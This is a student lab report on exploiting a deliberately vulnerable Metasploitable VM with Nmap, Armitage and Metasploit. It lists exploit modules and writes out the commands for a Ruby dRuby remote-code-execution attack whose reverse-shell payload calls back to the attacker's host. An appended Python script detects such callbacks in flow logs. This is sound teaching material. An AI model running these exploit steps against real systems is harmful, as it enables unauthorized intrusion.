CS 6055 - CYBER DEFENSE OVERVIEW LAB 2 REPORT
Objective:
To report all the suspicious findings in the given operating system.
Procedure:
Step-1:
The database server used by Metasploit and the Armitage GUI are started.
Step-2:
An Nmap scan is performed to detect the operating system. The IP address of Metasploitable (192.168.56.101) is given as the target. The operating system is now detected and is visible in Armitage.
Step-3:
Attacks -> Find attacks
The Armitage GUI finds all the attacks. An "Attack" menu is now attached to the detected OS, and we can find all the attacks that are possible.
Step-4:
Hail Mary launches a flood of attacks and some vulnerabilities are found. I found some other vulnerabilities by trial and error. The exploits I found using Hail Mary are:
exploit/multi/http/php_cgi_arg_injection
exploit/unix/ftp/vsftpd_234_backdoor
exploit/unix/irc/unreal_ircd_3281_backdoor
By trial and error:
exploit/linux/misc/drb_remote_codeexec
exploit/multi/samba/usermap_script
exploit/misc/distcc_exec
exploit/multi/misc/java_rmi_server
Launching the attacks found by trial and error manually creates a shell for each attack. The attacks are launched manually by double-clicking on them. The screenshots below show the launching and the respective opened shells.
exploit/multi/samba/usermap_script
exploit/misc/distcc_exec
exploit/multi/misc/java_rmi_server
The vulnerability exploit/linux/misc/drb_remote_codeexec is executed manually by using the following commands.
set URI druby://192.168.56.101:8787 (the URI is set to the victim's IP address and the port used is 8787)
set payload cmd/unix/reverse (the payload is set to this path)
set LHOST 192.168.56.102 (LHOST is set to the attacker's IP address)
set LPORT 8080 (the local port is set to 8080)
exploit (used to launch the attack)
Then the attack is launched and the corresponding shell is opened.
exploit/linux/misc/drb_remote_codeexec
The commands used in the shell give the details of the Metasploitable OS. The commands used are:
hostname - It gives the name of the host you are connected to; in this case the host is metasploitable.
whoami - It prints the username associated with the current effective user ID.
cd / - It changes the current directory to the root directory.
ls - It lists the files in the current directory.
I used these basic commands to show that I am able to get into the Metasploitable OS with this process.
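
A defender-side check for the reverse-shell step above, added here as an example and not part of the original report: it scans connection records for the server opening a connection back to a peer that had just connected to it, which is the traffic pattern the cmd/unix/reverse payload with LHOST 192.168.56.102 and LPORT 8080 produces. The log format, the sample records, the function names and the 5-second window are assumptions made for the illustration.

```python
from collections import namedtuple

# One TCP connection attempt: time in seconds, initiator addr/port, responder addr/port.
Flow = namedtuple("Flow", "ts src sport dst dport")

# Constructed sample flow log (not captured from the lab), using the report's addresses.
SAMPLE_LOG = """\
100.0 192.168.56.102 40112 192.168.56.101 8787
100.4 192.168.56.101 51514 192.168.56.102 8080
130.0 192.168.56.102 40200 192.168.56.101 80
400.0 192.168.56.101 51600 192.168.56.102 8080
500.0 192.168.56.103 41000 192.168.56.101 8787
"""

def parse_flows(text):
    """Parse 'ts src sport dst dport' lines into Flow records sorted by time."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip blank or malformed lines
        ts, src, sport, dst, dport = parts
        flows.append(Flow(float(ts), src, int(sport), dst, int(dport)))
    return sorted(flows, key=lambda f: f.ts)

def find_callbacks(flows, server, window=5.0):
    """Return (inbound, outbound) pairs where `server` accepts a connection and
    then initiates one back to the same peer within `window` seconds."""
    alerts = []
    last_inbound = {}  # peer address -> most recent inbound flow to the server
    for f in flows:
        if f.dst == server:
            last_inbound[f.src] = f
        elif f.src == server:
            inbound = last_inbound.get(f.dst)
            if inbound and 0 <= f.ts - inbound.ts <= window:
                alerts.append((inbound, f))
    return alerts

if __name__ == "__main__":
    for inbound, outbound in find_callbacks(parse_flows(SAMPLE_LOG), "192.168.56.101"):
        print(f"ALERT: {outbound.src} connected back to {outbound.dst}:{outbound.dport} "
              f"{outbound.ts - inbound.ts:.1f}s after inbound on port {inbound.dport}")
```

A server such as this one normally only accepts connections, so an outbound connection to a client that has just reached a service port is worth an alert; an egress rule that blocks server-initiated connections stops the same callback outright.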